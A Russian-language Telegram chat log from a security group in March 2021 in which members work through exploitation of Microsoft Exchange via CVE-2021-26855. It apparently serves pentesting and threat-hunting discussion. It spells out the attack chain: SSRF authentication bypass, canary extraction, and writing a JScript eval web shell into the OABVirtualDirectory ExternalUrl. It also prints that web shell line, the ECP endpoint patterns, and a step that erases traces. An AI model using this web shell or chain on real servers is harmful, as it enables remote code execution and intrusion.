Size: a a a

2021 March 07

AK

Anton Kirsanov 🐸 in secinfosec
@zer0way_1 кстати там в ssrf не пробовал на нетшару сослаться и нтлм словить?
источник

AK

Anton Kirsanov 🐸 in secinfosec
да и вообще судя по байпасу аутентификации, вам нужно просто сходить в админку экчейнжа и из вебморды найти подходящий соап запрос для файлврайта, и потом сунуть его в https://bezpecarna.com/exploitation-example-for-vulnerability-cve-2021-26855/
источник

Z

Zer🦠way in secinfosec
Anton Kirsanov 🐸
@zer0way_1 кстати там в ssrf не пробовал на нетшару сослаться и нтлм словить?
Оно без указания протокола
источник

AK

Anton Kirsanov 🐸 in secinfosec
а ну вот и детали rce
источник

AK

Anton Kirsanov 🐸 in secinfosec
источник

AK

Anton Kirsanov 🐸 in secinfosec
источник

AK

Anton Kirsanov 🐸 in secinfosec
действительно в OABVirtualDirectory
источник

AK

Anton Kirsanov 🐸 in secinfosec
похоже что сперва получают папку OABVirtualDirectory, потом ставят свою где то в вебруте, и вызывают какой-то метод для записи файла в эту директорию
источник

AK

Anton Kirsanov 🐸 in secinfosec
о, проглядел, все еще печальнее
источник

AK

Anton Kirsanov 🐸 in secinfosec
ExternalUrl                     : http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["Ananas"],"unsafe");}</script>
источник

AK

Anton Kirsanov 🐸 in secinfosec
то есть при установке параметра OABVirtualDirectory туда можно сунуть runat=server скрипт прям в параметр, и он исполнится
источник

A

Andrey in secinfosec
Anton Kirsanov 🐸
ExternalUrl                     : http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["Ananas"],"unsafe");}</script>
Это откуда?
источник

AK

Anton Kirsanov 🐸 in secinfosec
источник

PK

Pavel Korostelev in secinfosec
Zer🦠way
Один ексч, крутись как хочешь
флешки у офиса разбросать? )))
источник

Z

Zer🦠way in secinfosec
Pavel Korostelev
флешки у офиса разбросать? )))
Это порнография:)
источник

Z

Zer🦠way in secinfosec
Вне скопа:)
источник

A

Andrey in secinfosec
https://twitter.com/80vul/status/1367479893617827841 тут по сути необходимые шаги можно посмотреть
источник

AK

Anton Kirsanov 🐸 in secinfosec
Anton Kirsanov 🐸
достаточно неплохие кандидаты для поиска по вирустоталу
/ecp/DDI/DDIService.svc/GetObject?msExchEcpCanary=(.*)&schema=OABVirtualDirectory
/ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=(.*)&schema=ResetOABVirtualDirectory
да, похоже там использование ssrf для обхода аутентификации, потом извлечение msExchEcpCanary и дальше работа через /ecp/DDI/DDIService.svc/SetObject?msExchEcpCanary=(.*)&schema=OABVirtualDirectory и установка параметра
ExternalUrl                     : http://f/<script language="JScript" runat="server">function Page_Load(){eval(Request["PARAMNAME"],"unsafe");}</script>
источник

AK

Anton Kirsanov 🐸 in secinfosec
что и дает рце
источник

AK

Anton Kirsanov 🐸 in secinfosec
еще и сбрасывают в конце параметр через ResetOABVirtualDirectory, чтоб меньше следов в конфигурации оставлять
источник